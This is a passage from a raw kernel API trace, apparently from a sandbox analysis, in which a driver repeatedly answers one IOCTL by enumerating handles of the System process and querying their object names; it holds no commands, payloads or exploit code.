ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.608] ObfDereferenceObject (Object=0xffffe00080dbc360) returned 0x7fff [0288.608] IoCompleteRequest () returned 0x0 [0288.608] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xba, lpOverlapped=0x0) returned 1 [0288.608] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.608] PsAcquireProcessExitSynchronization () returned 0x0 [0288.608] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.608] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00080dbc070, HandleInformation=0x0) returned 0x0 [0288.608] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.608] PsReleaseProcessExitSynchronization () returned 0x2 [0288.608] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e6 [0288.608] ObQueryNameString (in: Object=0xffffe00080dbc070, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.608] ObfDereferenceObject (Object=0xffffe00080dbc070) returned 0x7fff [0288.608] IoCompleteRequest () returned 0x0 [0288.608] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xba, lpOverlapped=0x0) returned 1 [0288.608] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.608] PsAcquireProcessExitSynchronization () returned 0x0 [0288.608] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.608] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006d9ffca0, HandleInformation=0x0) returned 0x0 [0288.608] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.608] PsReleaseProcessExitSynchronization () returned 0x2 [0288.608] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e5 [0288.608] ObQueryNameString (in: Object=0xffffe0006d9ffca0, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.608] ObfDereferenceObject (Object=0xffffe0006d9ffca0) returned 0x7fff [0288.608] IoCompleteRequest () returned 0x0 [0288.608] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x88, lpOverlapped=0x0) returned 1 [0288.608] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.608] PsAcquireProcessExitSynchronization () returned 0x0 [0288.608] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.608] ObReferenceObjectByHandle (in: Handle=0xffffffff800000dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069290a20, HandleInformation=0x0) returned 0x0 [0288.608] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.608] PsReleaseProcessExitSynchronization () returned 0x2 [0288.608] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e4 [0288.608] ObQueryNameString (in: Object=0xffffe00069290a20, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.609] ObfDereferenceObject (Object=0xffffe00069290a20) returned 0x7fff [0288.609] IoCompleteRequest () returned 0x0 [0288.609] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0288.609] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.609] PsAcquireProcessExitSynchronization () returned 0x0 [0288.609] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.609] ObReferenceObjectByHandle (in: Handle=0xffffffff80000184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000692af930, HandleInformation=0x0) returned 0x0 [0288.609] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.609] PsReleaseProcessExitSynchronization () returned 0x2 [0288.609] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e3 [0288.609] ObQueryNameString (in: Object=0xffffe000692af930, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.609] ObfDereferenceObject (Object=0xffffe000692af930) returned 0x7ff8 [0288.609] IoCompleteRequest () returned 0x0 [0288.609] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x4a, lpOverlapped=0x0) returned 1 [0288.609] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.609] PsAcquireProcessExitSynchronization () returned 0x0 [0288.609] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.609] ObReferenceObjectByHandle (in: Handle=0xffffffff80000194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330090, HandleInformation=0x0) returned 0x0 [0288.609] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.609] PsReleaseProcessExitSynchronization () returned 0x2 [0288.609] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e2 [0288.609] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.609] ObfDereferenceObject (Object=0xffffe00069330090) returned 0x7f17 [0288.609] IoCompleteRequest () returned 0x0 [0288.609] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0288.609] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.609] PsAcquireProcessExitSynchronization () returned 0x0 [0288.609] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.609] ObReferenceObjectByHandle (in: Handle=0xffffffff80000198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069330290, HandleInformation=0x0) returned 0x0 [0288.609] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.609] PsReleaseProcessExitSynchronization () returned 0x2 [0288.609] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e1 [0288.609] ObQueryNameString (in: Object=0xffffe00069330290, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.609] ObfDereferenceObject (Object=0xffffe00069330290) returned 0x7ff9 [0288.609] IoCompleteRequest () returned 0x0 [0288.609] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0288.609] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.609] PsAcquireProcessExitSynchronization () returned 0x0 [0288.609] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.610] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069347de0, HandleInformation=0x0) returned 0x0 [0288.610] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.610] PsReleaseProcessExitSynchronization () returned 0x2 [0288.610] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8e0 [0288.610] ObQueryNameString (in: Object=0xffffe00069347de0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.610] ObfDereferenceObject (Object=0xffffe00069347de0) returned 0x7ff2 [0288.610] IoCompleteRequest () returned 0x0 [0288.610] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa2, lpOverlapped=0x0) returned 1 [0288.610] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.610] PsAcquireProcessExitSynchronization () returned 0x0 [0288.610] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.610] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006dd2baa0, HandleInformation=0x0) returned 0x0 [0288.610] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.610] PsReleaseProcessExitSynchronization () returned 0x2 [0288.610] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8df [0288.610] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.610] ObfDereferenceObject (Object=0xffffe0006dd2baa0) returned 0x8013 [0288.610] IoCompleteRequest () returned 0x0 [0288.610] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8a, lpOverlapped=0x0) returned 1 [0288.610] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.610] PsAcquireProcessExitSynchronization () returned 0x0 [0288.610] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.610] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006957a750, HandleInformation=0x0) returned 0x0 [0288.610] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.610] PsReleaseProcessExitSynchronization () returned 0x2 [0288.610] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8de [0288.610] ObQueryNameString (in: Object=0xffffe0006957a750, ObjectNameInfo=0xffffe00069121044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069121044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.610] ObfDereferenceObject (Object=0xffffe0006957a750) returned 0x7fff [0288.610] IoCompleteRequest () returned 0x0 [0288.610] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0288.610] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.610] PsAcquireProcessExitSynchronization () returned 0x0 [0288.610] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.610] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069341760, HandleInformation=0x0) returned 0x0 [0288.610] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.610] PsReleaseProcessExitSynchronization () returned 0x2 [0288.610] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8dd [0288.610] ObQueryNameString (in: Object=0xffffe00069341760, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.610] ObfDereferenceObject (Object=0xffffe00069341760) returned 0x7ffc [0288.610] IoCompleteRequest () returned 0x0 [0288.611] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.611] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.611] PsAcquireProcessExitSynchronization () returned 0x0 [0288.611] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.611] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069332600, HandleInformation=0x0) returned 0x0 [0288.611] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.611] PsReleaseProcessExitSynchronization () returned 0x2 [0288.611] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8dc [0288.611] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.611] ObfDereferenceObject (Object=0xffffe00069332600) returned 0x7f1c [0288.611] IoCompleteRequest () returned 0x0 [0288.611] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.611] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.611] PsAcquireProcessExitSynchronization () returned 0x0 [0288.611] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.611] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069101830, HandleInformation=0x0) returned 0x0 [0288.611] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.611] PsReleaseProcessExitSynchronization () returned 0x2 [0288.611] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8db [0288.611] ObQueryNameString (in: Object=0xffffe00069101830, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.611] ObfDereferenceObject (Object=0xffffe00069101830) returned 0x7fff [0288.611] IoCompleteRequest () returned 0x0 [0288.611] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x26, lpOverlapped=0x0) returned 1 [0288.611] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.611] PsAcquireProcessExitSynchronization () returned 0x0 [0288.611] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.611] ObReferenceObjectByHandle (in: Handle=0xffffffff80000240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693c9240, HandleInformation=0x0) returned 0x0 [0288.611] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.611] PsReleaseProcessExitSynchronization () returned 0x2 [0288.611] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8da [0288.611] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.611] ObfDereferenceObject (Object=0xffffe000693c9240) returned 0x7fff [0288.611] IoCompleteRequest () returned 0x0 [0288.611] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa8, lpOverlapped=0x0) returned 1 [0288.611] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.611] PsAcquireProcessExitSynchronization () returned 0x0 [0288.611] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.611] ObReferenceObjectByHandle (in: Handle=0xffffffff8000024c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069436980, HandleInformation=0x0) returned 0x0 [0288.611] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.611] PsReleaseProcessExitSynchronization () returned 0x2 [0288.611] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d9 [0288.612] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.612] ObfDereferenceObject (Object=0xffffe00069436980) returned 0x8008 [0288.612] IoCompleteRequest () returned 0x0 [0288.612] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xb8, lpOverlapped=0x0) returned 1 [0288.612] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.612] PsAcquireProcessExitSynchronization () returned 0x0 [0288.612] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.612] ObReferenceObjectByHandle (in: Handle=0xffffffff80000250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069437e50, HandleInformation=0x0) returned 0x0 [0288.612] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.612] PsReleaseProcessExitSynchronization () returned 0x2 [0288.612] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d8 [0288.612] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.612] ObfDereferenceObject (Object=0xffffe00069437e50) returned 0x800b [0288.612] IoCompleteRequest () returned 0x0 [0288.612] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xbc, lpOverlapped=0x0) returned 1 [0288.612] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.612] PsAcquireProcessExitSynchronization () returned 0x0 [0288.612] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.612] ObReferenceObjectByHandle (in: Handle=0xffffffff80000254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006e7fc810, HandleInformation=0x0) returned 0x0 [0288.612] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.612] PsReleaseProcessExitSynchronization () returned 0x2 [0288.612] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d7 [0288.612] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.612] ObfDereferenceObject (Object=0xffffe0006e7fc810) returned 0x7ff3 [0288.612] IoCompleteRequest () returned 0x0 [0288.612] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x76, lpOverlapped=0x0) returned 1 [0288.612] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.612] PsAcquireProcessExitSynchronization () returned 0x0 [0288.612] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.612] ObReferenceObjectByHandle (in: Handle=0xffffffff80000258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069538180, HandleInformation=0x0) returned 0x0 [0288.612] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.612] PsReleaseProcessExitSynchronization () returned 0x2 [0288.612] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d6 [0288.612] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.612] ObfDereferenceObject (Object=0xffffe00069538180) returned 0x7f1e [0288.612] IoCompleteRequest () returned 0x0 [0288.612] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x86, lpOverlapped=0x0) returned 1 [0288.612] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.612] PsAcquireProcessExitSynchronization () returned 0x0 [0288.612] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.613] ObReferenceObjectByHandle (in: Handle=0xffffffff80000260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, 